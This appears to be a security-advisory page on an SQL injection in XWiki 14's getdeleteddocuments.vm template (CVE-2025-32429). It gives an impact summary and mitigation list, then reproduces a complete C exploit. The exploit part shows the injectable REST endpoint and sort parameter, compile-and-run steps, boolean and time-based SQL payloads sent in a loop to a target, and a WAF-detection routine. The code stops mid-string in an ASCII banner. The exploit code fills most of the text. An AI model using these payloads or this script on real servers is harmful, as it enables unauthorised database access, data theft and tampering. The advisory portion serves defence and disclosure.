XWiki 14 - SQL Injection via getdeleteddocuments.vm
XWiki 14 - SQL Injection via getdeleteddocuments.vm
AI Analysis
Technical Summary
The reported security threat concerns an SQL Injection vulnerability in XWiki version 14, specifically via the getdeleteddocuments.vm component. XWiki is an open-source enterprise wiki platform widely used for collaborative content management. The vulnerability arises from improper sanitization or validation of user input within the getdeleteddocuments.vm template, which likely constructs SQL queries dynamically. An attacker can exploit this flaw by injecting malicious SQL code through crafted input parameters, potentially allowing unauthorized access to the underlying database. This can lead to data leakage, unauthorized data modification, or even complete compromise of the database backend. The presence of exploit code written in C indicates that a proof-of-concept or weaponized exploit exists, facilitating exploitation by attackers. Although no specific affected subversions are listed, the vulnerability is tied to XWiki 14, suggesting that all installations running this major version without patches are at risk. No official patches or mitigations are referenced, implying that users should exercise caution and monitor for vendor updates. The exploit targets web application layers, leveraging the server-side Velocity template engine (.vm files) to inject SQL commands, a common vector in web application attacks. Given the medium severity rating and the availability of exploit code, this vulnerability represents a credible threat to organizations using XWiki 14 for internal or external documentation and collaboration.
Potential Impact
For European organizations, the impact of this SQL Injection vulnerability can be significant, especially for those relying on XWiki 14 for knowledge management, documentation, and collaboration. Exploitation could lead to unauthorized disclosure of sensitive corporate information, intellectual property, or personal data, potentially violating GDPR and other data protection regulations. Data integrity may be compromised if attackers modify or delete records, disrupting business operations and damaging trust. Availability could also be affected if attackers execute destructive SQL commands or cause database crashes. Given the collaborative nature of XWiki, compromised systems might serve as a pivot point for further network infiltration or lateral movement. The medium severity suggests that while exploitation requires some technical skill, the presence of public exploit code lowers the barrier for attackers, increasing the risk of opportunistic attacks. Organizations in sectors with stringent compliance requirements, such as finance, healthcare, and government, face heightened risks due to potential regulatory penalties and reputational damage.
Mitigation Recommendations
To mitigate this threat, European organizations should immediately audit their XWiki 14 deployments for the presence of the getdeleteddocuments.vm template and assess exposure to untrusted input. Since no official patches are currently referenced, organizations should: 1) Implement Web Application Firewall (WAF) rules to detect and block SQL injection patterns targeting the vulnerable endpoint. 2) Restrict access to the affected component via network segmentation or authentication controls to limit exposure. 3) Review and sanitize all user inputs processed by Velocity templates, applying strict input validation and parameterized queries where possible. 4) Monitor logs for suspicious activity related to SQL errors or unusual database queries. 5) Engage with the XWiki community or vendor for updates and patches addressing this vulnerability. 6) Consider temporary disabling or restricting the getdeleteddocuments.vm functionality if feasible until a fix is available. 7) Conduct penetration testing focused on SQL injection vectors to verify the effectiveness of mitigations.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Sweden
Indicators of Compromise
- exploit-code: # Exploit Title: XWiki 14 - SQL Injection via getdeleteddocuments.vm # Google Dork: N/A # Date: 28 July 2025 # Exploit Author: Byte Reaper # LinkedIn: N/A # Vendor Homepage: https://www.xwiki.org # Software Link: https://www.xwiki.org # Version: XWiki Platform ≤ 14.x # Tested on: XWiki Platform ≤ 14.x # CVE: CVE-2025-32429 ## Vulnerability Description A blind SQL Injection vulnerability exists in the XWiki Platform’s `getdeleteddocuments.vm` template, specifically via the `sort` parameter. The vulnerability can be exploited by sending a crafted payload to the following REST endpoint: ``` /xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=<PAYLOAD> ``` An attacker can inject arbitrary SQL statements into the underlying database query, resulting in data exfiltration, authentication bypass, or denial of service. The vulnerability was verified on XWiki Platform versions up to 14.x using a C-based curl exploit. ## Steps to Reproduce 1. Save the provided `exploit.c` file to your local environment. 2. Compile the PoC: ``` gcc -o exploit exploit.c argparse.c -lcurl ``` 3. Execute against a vulnerable instance: ``` ./exploit -u http://victim.example.com/xwiki ``` 4. Observe response delays or injected content indicating successful SQL execution. ## Proof of Concept - GitHub PoC: https://github.com/byteReaper77/CVE-2025-32429/blob/main/exploit.c /* * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-32429 * Vulnerability: SQL Injection * Description : A vulnerability in the xwiki platform using the sort operator in the getdeletedocuments.v file, which leads to injecting malicious SQL statements into the sort= parameter. * ------------------------------------------------------------------------------------------------------------------------------------ */ #include <stdio.h> #include <string.h> #include <curl/curl.h> #include "argparse.h" #include <time.h> #include <stdlib.h> #include <unistd.h> #define URL 2500 const char *yourUrl = NULL; int verbose = 0; int selecetCookie = 0; const char *cookies = NULL; void exitAssembly() { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $231, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitAssembly(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } const char *payload[] = { "' OR '1", " ' OR 1 -- -", " OR "" = ", "\" OR 1 = 1 -- -", ",(select * from (select(sleep(5)))a)", "%2c(select%20*%20from%20(select(sleep(5)))a)", "';WAITFOR DELAY '0:0:05'--", "AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='", "AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)", "AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--", "AS INJECTX WHERE 1=1 AND 1=0--", "WHERE 1=1 AND 1=1" }; const char *word[] = { "select", "union", "insert", "update", "delete", "drop", "create", "alter", "truncate", "replace", "or", "and", "not", "1=1", "1=0", "--", "#", "/*", "*/", "sleep", "benchmark", "load_file", "outfile", "error", "warning", "mysql", "pg_", "exec", "xp_", "admin", "root", "" }; int numberPayload = sizeof(payload) / sizeof(payload[0]); int numberWord = sizeof(word) / sizeof(word[0]); char full[URL]; void injection(const char *baseUrl) { CURLcode res ; CURL *curl = curl_easy_init(); struct Mem response = { NULL, 0 }; if (curl == NULL) { printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n"); printf("\e[1;31m[-] Check Your Connection (Ping)...\e[0m\n"); printf("\e[1;31m[-] Command : ping google.com\n"); const char *pingCommand = "/bin/ping"; const char *argv[] = {"ping", "-c", "5", "google.com", NULL}; const char *envp[] = {NULL}; __asm__ volatile ( "mov %[argv], %%rsi\n\t" "mov $59, %%rax\n\t" "mov %[envp], %%rdx\n\t" "mov %[command], %%rdi\n\t" "syscall\n\t" "cmp $0, %%rax\n\t" "jl exitSyscall\n\t" "exitSyscall:\n\t" "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" ".2:\n\t" : : [argv] "r" (argv), [envp] "r" (envp), [command] "r" (pingCommand) : "rax", "rdi", "rsi", "rdx" ); } response.buffer = NULL; response.len = 0; if (verbose) { printf("\e[1;35m==========================================\e[0m\n"); printf("\e[1;33m[+] Cleaning Response...\e[0m\n"); printf("\e[1;33m[+] Response Buffer : %s\e[0m\n",response.buffer); printf("\e[1;33m[+] Response Len : %d\e[0m\n",response.len); printf("\e[1;35m==========================================\e[0m\n"); } if (curl) { int n = 0; for (int p = 0; p < numberPayload; p++) { char *encodePayload = curl_easy_escape(curl, payload[p], 0); if (!encodePayload) { printf("\e[1;31m[-] Error Encode Payload !\e[0m\n"); exitAssembly(); } snprintf(full, sizeof(full), "%s/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=%s", baseUrl, encodePayload); printf("\e[1;34m[+] Encode Payload Successfully.\e[0m\n"); printf("\e[1;34m[+] Payload Encode : %s\e[0m\n", encodePayload); curl_easy_setopt(curl, CURLOPT_URL, full); struct timespec ts; ts.tv_sec = 0; ts.tv_nsec = 10000000; printf("\e[1;34m[+] sys_nanosleep syscall (10000000)...\e[0m\n"); __asm__ volatile ( "mov $35, %%rax\n\t" "mov %[ts], %%rdi\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : [ts] "r" (&ts) :"rax", "rdi", "rsi" ); if (selecetCookie) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *headers = NULL; headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); headers = curl_slist_append(headers, "Referer: http://example.com"); double delayTime; clock_t start = clock(); res = curl_easy_perform(curl); printf("\e[1;34m+] Payload : %s\e[0m\n", payload[p]); printf("\e[1;34m[+] Encode Payload %s\e[0m\n", encodePayload); printf("\e[1;32m[*] PID : %d\e[0m\n", getpid()); curl_free(encodePayload); curl_slist_free_all(headers); usleep(1000000); if (res == CURLE_OK) { printf("-----------------------------------------------------------------\n"); long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &delayTime); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); printf("\e[1;34m[+] Delay Time Response : %f\e[0m\n", delayTime); printf("\e[1;37m[+] Input Url : %s\e[0m\n", baseUrl); printf("\e[1;37m[+] Full Url : %s\e[0m\n", full); printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", httpCode); if (httpCode >= 200 && httpCode < 300) { clock_t end = clock(); double timeInjection = (double) (end - start )/ CLOCKS_PER_SEC; printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\n",httpCode); for (int w = 0; w < numberWord; w++) { if (strstr(response.buffer, word[w]) != NULL) { printf("\e[1;34m[+] A suspicious word was found in the server's response !!\e[0m\n"); printf("\e[1;34m[+] Word Found : %s\e[0m\n", word[w]); printf("[+] The vulnerability CVE-2025-32429 exists on the server\e[0m\n"); printf("\e[1;37m\n======================================== [Response Server] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[Len] : %d\e[0m\n", response.len); printf("\e[1;37m\n==================================================================================================\e[0m\n"); printf("[+] Check Timeout Response...\e[0m\n"); if (timeInjection >= 7.5) { printf("\e[1;34m[+] Possible SQL Executed (Delay Detected)\e[0m\n"); printf("\e[1;34m[+] The server is experiencing a vulnerability (CVE-2025-32429)\e[0m\n"); } else { printf("\e[1;31m[-] No response delay detected !\e[0m\n"); } } else { printf("\e[1;31m[-] No suspicious words were found in the server response !\e[0m\n"); } } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode); printf("\e[1;34m[+] Try Next Payload : %s\e[0m\n", payload[p]); } } else { printf("\e[1;31m[-] Error Send Request\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); printf("\e[1;31m[-] Please Check Your Connection !\e[0m\n"); exitAssembly(); } } } if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } curl_easy_cleanup(curl); } void checkWaf(const char *base) { printf("[+] Check Waf ============================================================\e[0m\n"); struct Mem response = {NULL, 0}; response.buffer = NULL; response.len = 0; int step1 = 0; int step2= 0; int step3 = 0; int step4 = 0; int step5 = 0; if (verbose) { printf("\e[1;33m[+] Response Buffer Cleaning Successfully \e[0m\n"); printf("\e[1;33m[+] Response Buffer : %s\e[0m\n", response.buffer); printf("\e[1;33m[+] Response Len : %zu\e[0m\n", response.len); } const char *keyWaf[] = { "Access Denied", "Request blocked", "Security violation", "Your request looks suspicious" }; int numberWaf = sizeof(keyWaf) / sizeof(keyWaf[0]); printf("\e[1;34m[+] Base URL : %s\e[0m\n", base); CURLcode res; char fullWaf[URL]; snprintf(fullWaf, sizeof(fullWaf), "%s/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=''", base); printf("\e[1;34m[+] Full Url : %s\e[0m\n",fullWaf); CURL *curl = curl_easy_init(); if (curl == NULL) { printf("\e[1;31m[-] Error: Could not initialize CURL.\e[0m\n"); exitAssembly(); } curl_easy_setopt(curl, CURLOPT_URL, fullWaf); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); struct curl_slist *headers = NULL; headers = curl_slist_append(headers, "User-Agent: sqlmap"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); res = curl_easy_perform(curl); double timeD = 0; long code = 0; long redirects = 0; if (res == CURLE_OK) { curl_easy_getinfo(curl, CURLINFO_REDIRECT_COUNT, &redirects); curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &timeD); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); printf("\e[1;36m[+] Step 1: Check Number redirects\e[0m\n"); if (redirects > 1) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Suspicious number of redirects: %ld\e[0m\n", redirects); printf("\e[1;35m============================================\e[0m\n"); step1 = 1; } else { printf("[-] Waf not detected (Number redirects)\e[0m\n"); } printf("\e[1;34m[+] Request sent with simple payload ('')\e[0m\n"); printf("\e[1;35m[+] Step 2: Check HTTP Code\e[0m\n"); printf("\e[1;32m[+] HTTP Code: %ld\e[0m\n", code); if (code == 403 || code == 404 || code == 503) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Blocking response code: %ld\e[0m\n", code); printf("\e[1;34m[+] Page is likely filtered by WAF.\e[0m\n"); printf("\e[1;35m============================================\e[0m\n"); step2 = 1; } else { printf("\e[1;31m[-] No blocking HTTP code.\e[0m\n"); printf("\e[1;31m[-] WAF not detected based on HTTP code.\e[0m\n"); } printf("[+] Step 3: Check Response Time\e[0m\n"); if (timeD >= 3.0) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Suspicious delay in response: %.2f sec\e[0m\n", timeD); printf("\e[1;35m============================================\e[0m\n"); step3 = 1; } else { printf("\e[1;31m[-] Normal response time: %.2f sec\e[0m\n", timeD); printf("\e[1;31m[-] WAF not detected based on delay.\e[0m\n"); } printf("[+] Step 4: Check Response Content\e[0m\n"); for (int l = 0; l < numberWaf; l++) { if (response.buffer) { if (strstr(response.buffer, keyWaf[l])) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Word Found : %s\e[0m\n",keyWaf[l]); printf("\e[1;34m[+] Waf Detected (Word Found In Response)\e[0m\n"); printf("\e[1;35m============================================\e[0m\n"); step4 = 1; } else { printf("\e[1;31m[-] Word Not Found : %s\e[0m\n", keyWaf[l]); printf("\e[1;31m[-] WAF not detected (Not Found Word in response)\e[0m\n"); } } else { printf("\e[1;31m[-] Response Buffer is NULL !\n"); printf("\e[1;35m[+] Step 5 : Check Response Server (NULL + Http Code 200)\e[0m\n"); if (code == 200) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;32m[+] Http Code : %ld\n", code); printf("\e[1;34m[+] Waf Detected (Response NULL And http Code 200)\e[0m\n"); if (verbose && response.buffer) { printf("\e[1;35m[+] Response Server : ==========================================\e[0m\n"); printf("%s\e[0m\n", response.buffer); } printf("\e[1;35m============================================\e[0m\n"); step5 = 1; } else { printf("\e[1;31m[-] Waf Not Detected (Http Code not 200 And buffer NULL)!\e[0m\n"); } } } } else { printf("[!] curl_easy_perform() failed: %s\e[0m\n", curl_easy_strerror(res)); } printf("\e[1;35m[+] Step 6: Check Connection Reset\e[0m\n"); if (res == CURLE_RECV_ERROR) { printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n"); printf("\e[1;34m[+] Connection reset detected (CURLE_RECV_ERROR)\e[0m\n"); printf("\e[1;35m============================================\e[0m\n"); } else { printf("\e[1;31m[-] No connection reset error.\e[0m\n"); } curl_slist_free_all(headers); curl_easy_cleanup(curl); printf("\e[1;35m\n[+] Result Status Waf : \e[0m\n"); if (step1 || step2 || step3 || step4 || step5) { printf("\e[1;36m[=] Final Verdict: WAF Detected \e[0m\n"); } else { printf("\e[1;31m[=] Final Verdict: No WAF Detected !\e[0m\n"); } } int main(int argc, const char **argv) { printf ( "⣦⠃⣿⣶⣶⣶⣶⣾⠀⠀⠀⠀⠀⠀⢀⡴⣲⠋⢁⡴⠋⠁⠀⣠⠶⠋⠁⠀⣠⢴⠆⠀⢠⠆⠀⢀⣠⢞⡓⠒⠀⠀⠉⠓⠲⢤⣀⠀⠀⠀⠀⠉⢧⡀⠀⠀⠀⠀⠀\n" " ⠀⣿⣿⣿⣿⣿⠇⠀⠀⠀⣀⡤⠚⠁⡼⣣⡴⠋⠀⠀⢀⡞⠁⠀⠀⢀⣠⣿⡋⠀⣠⣿⠴⠚⣉⣉⠉⠉⠉⠛⠭⣟⠒⢤⣀⠈⠙⠦⢄⣀⠀⠈⢣⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⠀⣸⣿⣿⣿⣿⡟⠀⣴⠚⠉⠁⠀⢀⡾⠟⠉⠀⠀⣀⣴⡟⠀⠀⣠⣖⣋⢹⣿⢁⣾⣏⠠⢤⣀⡀⠉⠙⠆⠀⠀⠀⠈⠳⢤⡈⠳⣄⠀⠀⠉⠙⠶⣌⣳⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⠀⣿⣿⣿⣿⡿⠀⠀⠈⠛⣒⣒⡾⠋⠀⠀⢀⣤⣾⢫⠟⠀⠀⣸⠧⣄⠘⠳⢯⡉⠈⠉⠓⣄⠀⠉⠻⣍⠛⠲⣄⠀⠀⠀⠀⠙⢦⡈⠓⢄⠀⠀⠀⠀⠙⢷⡀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⡸⣿⣿⡹⢿⣃⣀⠴⠊⠉⣠⠎⠀⠀⢀⣶⣿⠾⡵⠋⠀⠀⡼⣡⠴⣦⣀⣀⠀⠉⠲⣄⠀⠈⢳⡀⠀⠀⠱⣄⠀⠙⢆⠀⠀⠀⠀⠙⢦⡀⠱⣄⠀⠀⠀⠀⠹⣌⣓⣶⢶⡦⠀⠀⠀\n" "⢳⣿⣿⣿⣟⠟⠃⠀⣠⠞⠁⠀⠀⣤⠛⠛⢒⣾⢁⣴⣤⠞⢰⡇⢸⠋⢻⠈⣝⢦⡀⠈⠓⢄⠀⠱⡀⠀⠀⠈⠳⡀⠀⠳⣄⠀⠀⠀⠀⠙⢦⠈⠳⡀⠀⠲⣄⠈⢿⡄⠀⠀⠀⠀⠀\n" "⣼⣿⣿⢟⣡⡴⣹⠟⢁⠀⢀⣠⠞⠉⣽⠯⠉⢉⣽⢿⣶⣤⢸⢁⠿⡀⢸⡇⢘⢦⢻⡳⣄⠀⠀⠀⠙⣆⠀⠀⠀⠙⢆⠀⠘⢦⡀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠨⠵⣶⡄⠀⠀⠀⠀⠀\n" "⣿⡿⣵⣿⠋⠺⢥⣴⣯⠞⡋⢀⣤⠞⣱⢯⣴⠏⢡⡏⠀⢿⠸⢸⡀⡇⠈⣧⠈⢾⢏⢧⡈⠓⢦⡀⠀⠙⢧⣀⠀⠀⠈⠳⣄⠀⢳⡀⠀⠀⠀⠀⠀⠀⠀⠀⠐⢺⣯⣽⣦⠀⠀⠀⠀\n" "⣿⣾⣿⡅⠀⠀⠀⠸⠯⠯⡖⠋⣰⣣⢣⣿⠃⢀⠏⢠⠀⣾⠀⡞⣧⡇⠀⢸⡄⠘⣞⢇⣌⢆⠀⢻⡳⣄⡀⠈⠓⠤⣄⠀⠈⢣⣀⠻⡀⢦⡀⠀⠀⠀⠀⢀⣀⣰⣆⠉⡝⣧⠀⠀⠀\n" "⣿⢯⣿⠙⢦⠀⠀⠀⠀⣼⢁⣼⢇⢏⡿⠃⠀⡾⠀⡌⢀⡏⢰⡇⣿⢿⡇⢸⠻⠀⢸⡞⣯⡜⢦⠀⢷⠈⢻⡳⢤⡀⠈⠙⠒⠀⠙⢳⣅⠀⠙⣄⠀⠀⢸⣿⣿⣿⣿⣆⢰⣸⡄⠀⠀\n" "⡏⣼⣿⠒⠒⠤⠤⢤⣸⠃⡼⡛⢸⣼⡇⢠⣠⠁⢸⠁⣼⡇⢸⠀⡿⣿⡇⠸⠀⠀⠀⢻⡘⣧⠘⣇⠘⡆⠀⠹⣦⡈⠓⠦⣄⡀⠀⠀⠉⠳⣄⠈⢇⠀⠐⢿⣿⡛⠟⠋⠀⡇⣧⠀⠀\n" "⢠⣿⣿⠀⠀⠀⣠⡾⡿⣼⣧⡇⡇⣿⠀⠀⠻⣄⠀⠀⡇⡇⡆⠀⢻⣿⢇⢶⡀⢠⡄⠈⡿⡸⡆⢸⠀⢧⡀⠀⢻⠙⢆⠀⠀⠉⢳⡦⣄⣀⣈⠙⠾⣄⡀⠀⠀⢰⠀⠀⢠⡇⣿⠀⠀\n" "⣸⣿⣿⣄⣤⣾⠟⢠⡇⡏⣿⡇⣧⣿⠀⣀⡀⠈⣧⠀⡇⡇⡇⢸⢸⣿⢸⣼⢷⡀⠹⣄⠁⢳⡁⠀⡇⢈⢣⠀⠈⡇⠈⢧⡀⠀⠀⢷⡀⢢⠈⢹⡛⠓⠙⠛⠒⠈⡇⠀⠸⡇⣿⠀⠀\n" "⣿⣿⠟⣩⡞⠁⠀⢸⣷⠀⡟⡇⢸⠋⠻⢷⣝⢦⣿⣆⠀⡇⡇⢸⣾⣿⢼⣿⣼⣳⡄⢹⣧⡀⠁⠀⠗⢸⢸⠀⠀⡇⠀⠀⣷⡀⠀⠀⣷⡈⠀⠀⢧⢘⡀⠀⢀⠀⢸⡀⠀⣇⣿⠀⠀\n" "⠛⣡⣾⡏⠀⠀⠀⠀⣿⠀⠃⢻⣼⡀⣠⡄⠙⠿⡟⢹⠘⣿⠁⠀⠀⣿⠀⢻⠈⡏⠻⡄⢿⢳⡀⠀⢀⡟⠸⡇⠀⢸⠀⠀⢸⣷⡀⠀⢳⠳⡀⠀⠸⡎⡇⠀⠸⡇⠀⢷⠀⢹⠇⠀⠀\n" "⣴⣿⣿⡇⠀⠀⠀⠀⠸⣆⠀⠘⡿⣿⣿⣅⡀⢀⠟⠸⠀⢻⡥⠀⠀⣿⡄⢸⣆⣱⣀⠙⣦⢯⢳⠀⣸⢧⡇⣿⠀⠸⠀⠀⣸⣇⢳⠀⠘⢇⢹⡀⠀⣇⠃⠀⠀⡇⠀⡌⢷⡈⣆⠀⠀\n" "⣿⣿⣿⡇⠀⠀⠀⠀⠀⠹⣄⢠⣿⣿⠟⠋⣵⠏⠀⠀⠀⠸⡇⠈⠙⡟⠛⢺⡷⣶⣯⣭⣈⣿⡟⡇⡟⡼⡇⣿⠀⡇⠀⢀⣿⡞⠚⡀⣼⠘⠆⣇⠀⢸⠀⠀⢀⡇⠀⠁⢀⡷⣜⣄⠀\n" "⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⠘⢺⡏⢿⣤⠞⠁⠀⠀⠀⠀⠀⣷⠀⠀⠀⠀⠸⡇⠀⢳⠈⠙⠻⢿⣿⢀⣧⡇⣿⣰⠃⢀⣾⣿⣵⠀⣠⠏⡇⠀⣿⠀⡎⢠⣠⣼⡇⠀⢸⢿⡇⠘⠻⣄\n" "⣿⣿⣿⠒⠒⠒⠒⠒⠒⠒⠀⢸⡇⠀⢧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⣴⠈⠃⠀⠀⣸⠏⣼⡸⡟⣳⠃⢀⡞⣏⢋⣼⡟⠁⠀⡇⢠⠏⣸⣱⣾⣟⡿⡡⢀⡿⡿⡇⠀⠀⠈ \n" "⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠘⣇⠀⠀⢹⡦⠤⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⡟⠀⠀⠀⣰⠏⠀⢃⢧⡷⠃⣠⠏⠀⠉⡾⢹⢻⠀⡶⠣⠎⢀⣾⣻⠿⣸⠛⢡⡞⣼⠁⠱⠀⠀\n" "⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⡇⠀⠀⠖⠁⠀⠀⠞⡞⢁⣴⠥⠖⠛⢿⢷⣾⡾⡆⣿⣶⣋⣾⣿⣏⠀⢹⡾⠋⢰⠁⠀⠀⠀⠀⠀\n" "⣿⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣇⠰⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⡿⠁⠀⠀⠀⠀⠀⢀⣼⣵⡞⠁⢀⡔⠀⣿⣁⣼⠅⣧⠁⠘⣿⡼⠋⢸⡆⠀⢷⢸⠀⠀⠀⠀⠀⠀⠀\n" "⡏⠈⠉⠲⣄⡀⠀⠀⢀⣀⣤⣶⣿⣿⠀⢈⠙⠶⢦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⠁⢸⠃⢉⡿⠀⠀⢸⣽⠃⠀⠹⣄⣼⠷⠃⠀⠀⢳⠀⠘⣯⢧⠀⠀⠀⠀⠀⠀\n" "⣤⣤⣤⣤⣤⣽⣷⣿⣿⣿⣿⣿⣿⣿⡇⠀⠙⠲⣤⠈⠙⠲⣤⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣬⣤⠤⠖⠚⠛⠉⠀⠀⠀⠀⣿⠀⠀⠀⣿⠁⠀⠀⠀⢀⣼⠃⢰⡏⠀⠁⠀⠀⠀⠀⠀\n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡼⠁⠀⠀⣼⠙⠂⠀⣀⡶⠋⢀⣠⠞⠁⠀⠀⠀⠀⠀⠀⠀\n " "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠴⠚⠉⠀⠀⢀⡴⠁⠀⣠⠞⢁⣴⢾⣯⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⣀⣀⣀⣀⣀⣀⡠⢤⠞⠁⠀⠀⠀⠀⠀⠀⢀⣠⠤⠞⠋⢁⣀⣠⠤⠴⠚⠉⣀⣠⠜⢁⡴⣿⣧⣸⣿⣿⣿⣿⣿⣷⣶⣶⣦⣤⣄ \n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠉⠻⣅⠀⠀⠀⠀⡞⠀⠀⠀⠀⠀⢀⣠⠖⠋⠁⠀⠒⠊⠉⠁⠀⠀⠀⢀⣀⣭⣤⡖⢋⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ \n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠈⠓⠦⣄⣸⠁⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⣀⡤⠴⢺⣿⣿⣿⣿⣿⣿⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ \n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⢻⣀⣀⡤⠴⠶⠶⠶⠶⠦⢤⣤⠖⠋⠁⠀⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿ \n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⡞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣷⢀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀\n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⣀⡤⠴⠶⠶⠶⢤⣀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀\n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⡴⠋⠁⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀\n" ); const char *name = "\e[1;37m\t\t\t[ Byte Reaper 